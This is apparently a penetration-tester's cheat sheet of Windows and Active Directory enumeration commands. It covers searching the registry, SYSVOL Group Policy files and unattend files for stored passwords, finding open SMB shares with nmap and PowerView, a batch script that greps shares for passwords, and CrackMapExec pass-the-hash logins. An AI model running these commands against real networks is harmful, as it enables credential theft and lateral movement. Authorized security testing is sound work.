Windows OS Enumeration
net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s pass == cred == vnc == .config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /sFind Goodies
Service Account Credentials within SYSVOL Group Policy Preferences (GPP)
findstr /S /I cpassword \\domain.com\sysvol\domain.com\policies\*.xmlFind in files and registry
findstr /snip password *.xml *.ini *.txt (quicker than below)
findstr /snip password *dir /s *password* == *cred* == *vnc* == *.config*dir c:\*vnc.ini /s /bc:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xmlreg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
GPO settings
gpresult /z
gpresult /H (for Pretty HTML output)Users, Groups and Privileges
CMD
net localgroup administrators /domain
net group “Domain Controllers” /domain
net group “Domain Admins” /domain
net group “Enterprise Admins” /domain
net user /domain <UserName>Powershell
Get-ADDomainController -filter * | select hostname, operatingsystemGet-ADFineGrainedPasswordPolicy -filter *Get-ADDefaultDomainPasswordPolicyGet-ADUser <UserName>-Properties *Get-ADUser -filter * -properties Name, PasswordNeverExpires | where {$_.passwordNeverExpires -eq "true" } | Select-Object DistinguishedName,Name,EnabledGet-ADGroupMember -identity <GroupName>Get-ADComputer -filter * | select nameGet-GPO -all | select DisplayName, gpostatus
SMB File Shares
Find Hosts with SMB Open (Nmap)
nmap -vv -Pn -n -p 445 10.10.10.0/24 -oA smb_hostFormat:
grep open smb_host.gnmap | awk {'print $2'} > smb_up.txt && cat smb_up.txt
Find Open Shares (PowerView)
Invoke-ShareFinder -HostList hosts_with_smb.txt -NoPing -CheckShareAccess | Out-File -Encoding ascii found_shares.txtIf you want to remove the extra formatting of output in found_shares.txt, you can run:
grep -oP "(\s).?\-.*" found_shares.txt > found_shares.txt
Permissions (PowerView)
Invoke-FileFinder -ShareList .\found_shares.txt | ForEach-Object {Get-Acl $_.FullName} | Select-Object -Property Path,Owner,Group,AccessToString | Export-Csv Permissions.csvFind Interesting file names from Share list (PowerView)
Invoke-FileFinder -ShareList found_shares.txt -Terms confidential, password -Verbose | ForEach-Object {Get-Acl $_.FullName} | Format-ListBatch Script to search for in-file passwords in open shares found from steps above.
@echo off
for /F "tokens=*" %%a in (found_shares.txt) do (
C:
NET USE Z: /delete /y
net use z: “%%a”
Z:
echo %%a
echo %%a >> "C:\Temp\output_file.txt"
if exist z:\ ( findstr /snip password * >> "C:\Temp\output_file.txt" )
)Use password or hash for authentication (using CrackMapExec)
cme smb 192.168.1.0/24 -u UserName -H 'LM:NT'
cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE'Lists
